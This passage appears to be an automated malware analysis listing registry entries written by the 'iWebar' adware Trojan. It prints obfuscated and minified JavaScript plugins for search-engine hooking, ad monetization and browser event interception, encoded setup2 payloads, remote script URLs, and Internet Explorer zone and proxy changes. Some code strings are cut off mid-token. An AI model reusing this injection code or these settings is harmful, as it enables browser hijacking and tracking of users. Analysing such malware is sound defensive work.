    "JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length<=c.maxlength){e(f,g);}});};})(appAPI);(function(b){var c=functi粑P"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    [HKCU\Software\iWebar\Plugins\184]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ3ZjczNDQwYTE3MWIwNTMzMTMwYTU3NDA0NjQwMGIxYjAxMTY1YjQ5NWExNDE2MTE0ZDAxMWExNjEzMDkxNzE2MDMwZjEzMWYxNjQ4MDIwOTE4NTUwODEyMTAwZDVhMGEwZTAxMWMxOTQ4MDgxMDUwM2ExNDA4MDExYzE0MmYwNjVlMmE0ZDI3NTUyNzQ3NDkyNzRmMjE1ZjQ2NTI0YzIzNDc0YjU3NGYyMjU2MzQ1NjRjNTY0NTRiNTM1MzU0MmI0NDU2Mjc1MDMwNWMzNTBiMTcwYTNjMDI1YzM1MTQxNjAzMTE0NTNmMTQxNDE1MDgxMDA4MmYyNjVlNWQ0NTU2NTE1NjUzMmExNDBkMDcxYTE2MTIyZjA3MTgxZjViM2QzYzJjMjcyOTMyMzUyNzMzMjIyNzMxMzAzNDM2MzEzOTNiM2IyYjI3M2MzMDUzMzIwZTA5MTkxODA3MTAyYTBiNDgzOTNlMjUyNzM1MzUzMTMxMjYzMTIzMzMzOTI2MmYyNDNkMmEyYjJhMzk0MzRhN2Y3MzQ0MGExNzFiMDUxNTM0MTQxOTU4NWM0MjQxMDcwMTEyMTExNTRmNTU0OTBjMTMxYzViMDgwZTE2MDcxNTA0MGUwNjAyMDUxNjAyNDgxNjE1MGI0ZDBkMWYwNjA0NGUwYTFhMWQwZjAxNGQwNTA2NTkyZTE0MWMxZDBmMGMyYTBiNDgyMzU5Mjc0MTNiNTQ1MTIyNDIzNzU2NTI1MjU4M2Y1NDUzNTI0MjM0NWYyMDU2NTg0YTU2NTM1NjVlNDIyMjUwNTYzMzRjMjM0NDMwMDYwMTAzMjgwMjQ4MjkwNzBlMDYxYzUzMzYwMDE0MDExNDAzMTAyYTJiNDg1NDUxNTY0NTRhNDAzMjExMDAxMTEzMDIxMjNiMWIwYjA3NWUzMDJhMjUzMzI5MjYyOTM0MmIyNzJhMjczOTIwMzYyNTI1MjgyMzJlMmEL"

    [HKCU\Software\iWebar\Plugins\43]
    "Version" = "5"

    [HKCU\Software\iWebar\Plugins\41]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEInfo.js"

    [HKCU\Software\iWebar\Plugins]
    "BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"

    [HKCU\Software\iWebar\Plugins\21]
    "Name" = "debug"

    [HKCU\Software\iWebar\Plugins\47]
    "Name" = "resources_background"

    [HKCU\Software\iWebar\Plugins\217]
    "Name" = "similar_products_m"

    [HKCU\Software\iWebar\Plugins\44]
    "Name" = "IEMisc"

    [HKCU\Software\iWebar\Plugins\183]
    "Name" = "tabsWrapper"

    [HKCU\Software\iWebar\Plugins\64]
    "Name" = "appApiMessage"

    [HKCU\Software\iWebar\Plugins\102]
    "Version" = "8"

    [HKCU\Software\iWebar\Plugins\42]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEInternal.js"

    [HKCU\Software\iWebar\Plugins\35]
    "Version" = "4"

    [HKCU\Software\iWebar\Plugins\9]
    "Name" = "search_engine_hook"

    [HKCU\Software\iWebar\Plugins\3]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie8_fix_2.js"

    [HKCU\Software\iWebar\Plugins\155]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY3ZDdhNGQwNjFkMWUwNTJmMTAwODU1NDk0ZjRjMDExZTAxMGE1ODRiNTgxMDAzMDUwNDA1MWI1NDAxMGIxYTVjMGUwYTNhMGYwNzBjMDc0YjEwMTYxYjNhMDgwZDRhMTkwYjAwNGEyYzMwMmQzYjI1MjYyOTMwMmQzMzM2M2QzMTNhM2YzNzI1MmIyMDI4MmM0OTFlMDAwZTQ4MzkzMDM3MjUzNzNkNDgxZDEzMDUxZjVmMGQxOTE5MGEwZDFkNDg1OTcwNmI0NjA3MWYxYTA5MDAwNDNjMWU0MDVlNTc0MjVhNWI0NTYwNTU1YTQyNDQ1NTA1MGExYzFkMDMxNjFiMGU0NjRkNTMzNDRjMTkwNTA1MDk0MDM5N2QwZQ==', 'dwsonijuzb'); }"

    [HKCU\Software\iWebar\Plugins\4]
    "Version" = "4"

    [HKCU\Software\iWebar\Plugins\182]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var c={DUMMY_PAGE_URL:http://page.our-app.net/blank/resource.html};(function(){if(appAPI&&appAPI.internal&&appAPI.internal.hosts&&typeof appAPI.internal.hosts.dummyPageUrl===string&&appAPI.internal.hosts.dummyPageUrl.length>0){c.DUMMY_PAGE_URL=appAPI.internal.hosts.dummyPageUrl;}}());appAPI.openURL=(function(){var d=appAPI.openURL;var e=function(g){d({url:c.DUMMY_PAGE_URL ?appid= appAPI.appInfo.id &resourcepath= escape(g.resourcePath) &rnd= (new Date()).getTime(),where:g.where,focus:g.focus,focusTimer:g.focusTimer,left:g.left,top:g.top,height:g.height,width:g.width});};var f=function(g){if(!appAPI.utils.isObject(g)){return;}if(!appAPI.utils.isDefined(g.resourcePath)){d(g);return;}e(g);};return function(h,g){var i=h;try{if(appAPI.utils.isString(h)){d(h,g);return;}f(i);}catch(j){}};}());var a=function(){(function(){var f=document.createElement(link);f.type=image/x-icon;f.rel=shortcut icon;f.href=;document.getElementsByTagName(head)[0]L"

    [HKCU\Software\iWebar\Plugins\37]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEBrowserEvents.js"

    [HKCU\Software\iWebar\Plugins\39]
    "Version" = "5"

    [HKCU\Software\iWebar\Plugins\182]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/openUrl.js"

    [HKCU\Software\iWebar\Plugins]
    "BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,269,93,102,155,184,223,226,242,244,91"

    [HKCU\Software\iWebar\Plugins\177]
    "Name" = "crossriderDashboard"

    [HKCU\Software\iWebar\Plugins\40]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActiEL"

    [HKCU\Software\iWebar\Plugins\207]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=$jquery_171;function c(f){return true;}function b(g,f){f=appAPI.utils.isFunction(f)?f:c;return d.map(g,function(h){return f(h)?h:null;});}function a(f){f.getList=(function(){var g=f.getList;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.getKeys=(function(){var g=f.getKeys;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.removeAll=(function(){var g=f.removeAll;return function(h){if(!appAPI.utils.isObject(h)){return g.call(f);}d.each(f.getList(h),function(j,k){f.remove(k.key);});};}());}function e(g){g.getList=(function(){var h=g.getList;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callback)){return;}h.call(g,function(j){i.callback(b(j,i.predicate));});};}());g.getKeys=(function(){var h=g.getKeys;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callbacL"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKCU\Software\iWebar\Plugins\9]
    "Version" = "3"

    [HKCU\Software\iWebar\Plugins\17]
    "Name" = "jQuery"

    [HKCU\Software\iWebar\Plugins\244]
    "Name" = "engageya_inner_m"

    [HKCU\Software\iWebar\Plugins\37]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100)};appAPI.openURL(a);}});appAPI.internal.callbacks.setEventHandler(runHelper,function(b){if(appAPI.isActiveTab()){var a=b;appA"

    [HKCU\Software\iWebar\Plugins\17]
    "Version" = "4"

    [HKCU\Software\iWebar\Plugins\47]
    "Version" = "3"

    [HKCU\Software\iWebar\Plugins\182]
    "Name" = "openUrl"

    [HKCU\Software\iWebar\Plugins\257]
    "Version" = "1"

    [HKCU\Software\iWebar\Plugins\7]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/hooks.js"

    [HKCU\Software\iWebar\Plugins\246]
    "JavaScript" = "var _0x25da=[""\x73\x74\x72\x69\x6E\x67""

    [HKCU\Software\iWebar\Plugins\45]
    "Version" = "4"

    [HKCU\Software\iWebar\Plugins\21]
    "Version" = "5"

    [HKCU\Software\iWebar\Plugins\242]
    "Name" = "price_gong_m"

    [HKCU\Software\iWebar\Plugins\102]
    "Name" = "dealply_m"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKCU\Software\iWebar\Plugins\46]
    "Name" = "IETimers"

    [HKCU\Software\iWebar\Plugins\78]
    "JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)<0&&/(mozilla)(?:.*? rv:([\w.] )|)/.exec(h)||[];var f=/(ipad)/.exec(h)||/(iphone)/.exec(h)||/(android)/.exec(h)||/(windows)/.exec(h)||/(mac)/.exec(h)||/(linux)/.exec(h)||/(ubuntu)/.exec(h)||[];return{browser:g[1]||,version:g[2]||0,platform:f[0]||};};a=d.uaMatch(c.navigator.userAgent);b={};if(a.browser){b[a.browser]=true;b.name=(b.rv?msie:a.browser);b.version=a.version;}if(a.platform){b[a.platform]=true;b.os=(a.platform===windows?win:a.platform);}if(b.chrome||b.opr){b.webkit=true;}else{if(b.webkit){b.safari=true;}}if(b.rv){b.L"

    [HKCU\Software\iWebar\Plugins\42]
    "JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;ŋL"

    [HKCU\Software\iWebar\Plugins\46]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IETimers.js"

    [HKCU\Software\iWebar\Plugins\226]
    "JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[226] = function() { if (appAPI.internal.monetization.loader && appAPI.internal.monetization.loader.setCampaignId) { appAPI.internal.monetization.loader.setCampaignId(1026); }};"

    [HKCU\Software\iWebar\Plugins\9]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/searchengines_hook.js"

    [HKCU\Software\iWebar\Plugins\246]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/setup.js"

    [HKCU\Software\iWebar\Plugins\3]
    "Name" = "ie8_fix_2"

    [HKCU\Software\iWebar\Plugins\244]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/engageya_inner_m.js"

    [HKCU\Software\iWebar\Plugins\37]
    "Name" = "IEBrowserEvents"

    [HKCU\Software\iWebar\Plugins\93]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/superfish_no_coupons_m.js"

    [HKCU\Software\iWebar\Plugins\45]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEOnRequest.js"

    [HKCU\Software\iWebar\Manifest]
    "Version" = "278"
    "PublisherId" = "21836"

    [HKCU\Software\iWebar\Plugins\13]
    "Name" = "CrossriderAppUtils"

    [HKCU\Software\iWebar\Plugins\217]
    "Version" = "20"

    [HKCU\Software\iWebar\Plugins\35]
    "Name" = "IEAjax"

    [HKCU\Software\iWebar\Plugins\220]
    "JavaScript" = "if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){if(!String.prototype.trim){String.prototype.trim=function(){return this.replace(/^\s |\s $/g,);};}if(!Array.prototype.filter){Array.prototype.filter=function(f){if(!this){throw new TypeError();}var k=Object(this);var e=k.length>>>0;if(typeof f!==function){throw new TypeError();}var j=[];var h=arguments[1];for(var g in k){if(k.hasOwnProperty(g)){if(f.call(h,k[g],g,k)){j.push(k[g]);}}}return j;};}if(!Array.prototype.forEach){Array.prototype.forEach=function c(l,f){var h,g;if(this==null){throw new TypeError(this is null or not defined);}var i,j=Object(this),e=j.length>>>0;if({}.toString.call(l)!==[object Function]){throw new TypeError(l is not a function);}if(arguments.length>=2){h=f;}g=0;while(g
    [HKCU\Software\iWebar\Plugins\195]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/icm_convertmedia_m.js"

    [HKCU\Software\iWebar\Plugins\257]
    "Name" = "adextent_m"

    [HKCU\Software\iWebar\Plugins\177]
    "JavaScript" = "(function(){if(!(appAPI.isMatchPages&&appAPI.isMatchPages(*crossrider.com/extension_dashboard/dashboard.html))){return;}function o(p){return String(p).replace(//g,>);}function e(aR,aC){function aW(){while(aE.length&&(aE[aE.length-1]=== ||aE[aE.length-1]===aT)){aE.pop();}}function aq(p){return p===[EXPRESSION]||p===[INDENTED-EXPRESSION];}function af(p){return p.replace(/^\s\s*|\s\s*$/,);}function an(q){aQ.eat_next_space=false;if(ag&&aq(aQ.mode)){return;}q=typeof q===undefined?true:q;aQ.if_line=false;aW();if(!aE.length){return;}if(aE[aE.length-1]!==\n||!q){ac=true;aE.push(\n);}for(var p=0;p
    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKCU\Software\iWebar\Plugins\91]
    "JavaScript" = "(function(t){var v=06-01;if(!appAPI.isBackground&&appAPI.dom&&appAPI.dom.isIframe()){return;}var F=appAPI.utils.MD5;if(!F||!F.encode){F={};F.encode=function(M){return M;};}if(typeof appAPI.internal.monetization===undefined){appAPI.internal.monetization={};}var J=appAPI.utils;var w={DBNamespace:monetization_plugin_,RULS_JSON_NAMESPACE: rules_,MONETIZATION_PLUGINS_IDS:monetization_plugins_ids,IS_INSTALL_REPORTED:is_install_reported_,STATS_NAMESPACE:stats_,PLUGINS_VERSION:plugins_version_,GEO_URL:http://ipgeoapi.com/,BASE_DATE:new Date(2013,0,1),updateInterval:1000*60*60*6,rulesJsonHostUrl:http://app.datademoserv.com/monetization_campaigns/,statsHostUrl:http://logs.datademoserv.com/monetization.gif?,errorHostUrl:http://errors.datademoserv.com/monetization-error.gif?,countryName:,reportQueryString:,subID:000000000000000000,reportEvents:{installEventId:0,dailyEventId:1,vertical:2,runningPlugins:6,installVertical:13,impressionsEventId:31,newAllowedVertical:32,policyAppDefualtInstallEve2L"

    [HKCU\Software\iWebar\Plugins]
    "PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"

    [HKCU\Software\iWebar\Plugins\226]
    "Version" = "4"

    [HKCU\Software\iWebar\Plugins\93]
    "Version" = "12"

    [HKCU\Software\iWebar\Plugins\17]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/jQuery.js"

    [HKCU\Software\iWebar\Plugins\269]
    "Version" = "1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKCU\Software\iWebar\Plugins\207]
    "Version" = "2"

    [HKCU\Software\iWebar\Plugins\28]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/initializer.js"

    [HKCU\Software\iWebar\Plugins\36]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEBackground.js"

    [HKCU\Software\iWebar\Plugins\104]
    "Version" = "9"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKCU\Software\iWebar\Plugins\91]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/monetizationLoader.js"

    [HKCU\Software\iWebar\Plugins\28]
    "Version" = "4"

    [HKCU\Software\iWebar\Plugins\223]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/imonomy_m.js"

    [HKCU\Software\iWebar\Plugins\22]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/resources.js"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKCU\Software\iWebar\Plugins\43]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEMessaging.js"

    [HKCU\Software\iWebar\Plugins\36]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eve"

    [HKCU\Software\iWebar\Plugins\220]
    "Version" = "8"

    [HKCU\Software\iWebar\Plugins\102]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/dealply_m.js"

    [HKCU\Software\iWebar\Plugins\22]
    "Name" = "resources"

    [HKCU\Software\iWebar\Manifest]
    "UninstallerOfferAction" = "NA"

    [HKCU\Software\iWebar\Plugins\1]
    "Name" = "base"

    [HKCU\Software\iWebar\Plugins\41]
    "JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""

    [HKCU\Software\iWebar\Plugins\242]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/price_gong_m.js"

    [HKCU\Software\iWebar\Plugins\155]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/ibario_pops_m.js"

    [HKCU\Software\iWebar\Code]
    "NewTabJavaScript" = ""

    [HKCU\Software\iWebar\Plugins\9]
    "JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'

  • '});this.addEngine({name:bing,url:bing.com,input:input[name=q],results:#results > ul,result:'
  • '});this.addEngine({name:yandex,url:yandex.ru,input:form.b-head-search input.b-form-input__input,form.b-search input.b-form-input__input,results:.b-body-items > ol,result:'
  • '});this.addEngine({name:yandex,url:yandex.com,input:form.b-search input.b-form-input__input,#searchInput,results:.b-serp2-list__portion,result:'
    '});this.addEngine({name:yahoo,url:yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:yahoo,url:search.yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:ask,urlL"

    [HKCU\Software\iWebar\Plugins\72]
    "Name" = "appApiValidation"

    [HKCU\Software\iWebar\Plugins\42]
    "Name" = "IEInternal"

    [HKCU\Software\iWebar\Plugins\104]
    "URL" = "http://js.clientstatsservice.com/plugins/javascripts/monetization/geo/jollywallet_m.js"

    [HKCU\Software\iWebar\Plugins\223]
    "Version" = "5"

    [HKCU\Software\iWebar\Plugins\177]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/crossriderDashboard.js"

    [HKCU\Software\iWebar\Plugins\184]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/noproblemppc_m.js"

    [HKCU\Software\iWebar\Plugins\183]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=__TABS_ON_UPDATED_ACTIVE_KEY;var c=__tabsOnUpdateActive__;var a={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(!appAPI.utils.isFunction(appAPI.internal.globalEval)){appAPI.internal.globalEval=function(e){(new Function(e)).apply(window);};}if(appAPI.internal.scope==a.SCOPE.BACKGROUND){appAPI.tabs.reloadTab=function(e){if(typeof e.delay===number){appAPI.setTimeout(function(){appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});},e.delay);}else{appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});}};appAPI.tabs.executeScript=function(e){appAPI.message.toAllTabs(e,{channel:__tabsExecuteScript__});};appAPI.tabs.onTabUpdated=function(e){if(typeof e!==function){return;}appAPI.message.addListener({channel:__tabsOnTabUpdated__},function(f){e(f);});appAPI.internal.db.set(d,true);appAPI.message.toAllTabs({},{channel:c});};}else{if(appAPI.internal.scope==a.SCOPE.PAGE&&!appAPI.dom.isIframe()){var b=functiL"

    [HKCU\Software\iWebar\Plugins\64]
    "JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){"

    [HKCU\Software\iWebar\Plugins\269]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY3ODYxNGExYzFhMTMxMzM5MTkwODUwNTI0ODU2MDYxMzE3MWM1MTRiNWQxODEwNWEwMzFlMDIwZjFmMGQwNDBkMWIwMDBmMTMxMDQyMDgwYjFmNDcwOTE3MWEwZTE1MDk0NDBkMTc0NjAyMDc1MTE1MGQwODU2M2IyZDNhMjYzMDMxMzg0MTQwNjE2ZDUwMDAxYzAwMWUxNDM2MWUwNzQ2NDg0ODRhMWMxYTEzMTMxZjUxNGI1ZDBhNWIxYTU2MDk1MDAyNTk0YTAxMWIwNDVhMDYxMDAwMDgwNTRhMWMwZDFjNWIwZjA0MTcwNTFkMDE1ZDAxMGQ1YTA0MTQ1YzFlMDUwMDRmMzczNzI2MjAyMzNjMzM0OTQ4Nzg2MTRhMDQwMjEyMDQwNTA1MmQxNjRhNTI1NDVjNTE1YTY2MTY=', 'drhhtngclk'); }"

    [HKCU\Software\iWebar\Plugins\4]
    "JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f(< a >).appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHttP"

    [HKCU\Software\iWebar\Manifest]
    "ChangePrevious" = "false"

    [HKCU\Software\iWebar\Plugins\64]
    "Version" = "3"

    [HKCU\Software\iWebar\Plugins\223]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MDg3OTczNGUwYTFiMWExMzNkMDgxZjUxNDA0YzQwMDcxYTE3MTg0MDVjNWMxOTA4MGM0MTE4MGExYjFiMTcxNzU0MGYwZDAyNDExMDBiMDgxYTAzMGU0MzUzNWI1YjU1NWY0ZDQxNDY0ZDVhNTc0MDFlMTEwZDE2MWMxMjFlNDIwODFjNTExMDFkMTgxYTE3NDczMzNkMmMzYzJjM2IyOTIxM2EzZTI5MzAzMDNkMzYyYTI1M2EzNzI1MzM0MDQzNjQ2YTRhMGExZjA2MWQwNTBjMjYwYTQxNTI1YTQxNDE0OTQwNjg0ZjRlNDM0ODU4MDUxNjA4MTgwYjBjMGYwZjRhNDA1MzI4NTgxZjBhMDAxZTEzMDExNDE0NTEyNzY2MWY=', 'sszlbonchz'); }"

    [HKCU\Software\iWebar\Manifest]
    "IsButtonEnabled" = "false"

    [HKCU\Software\iWebar\Debug]
    "IsDebuggingPlugins" = "0"

    [HKCU\Software\iWebar\Plugins\183]
    "Version" = "4"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
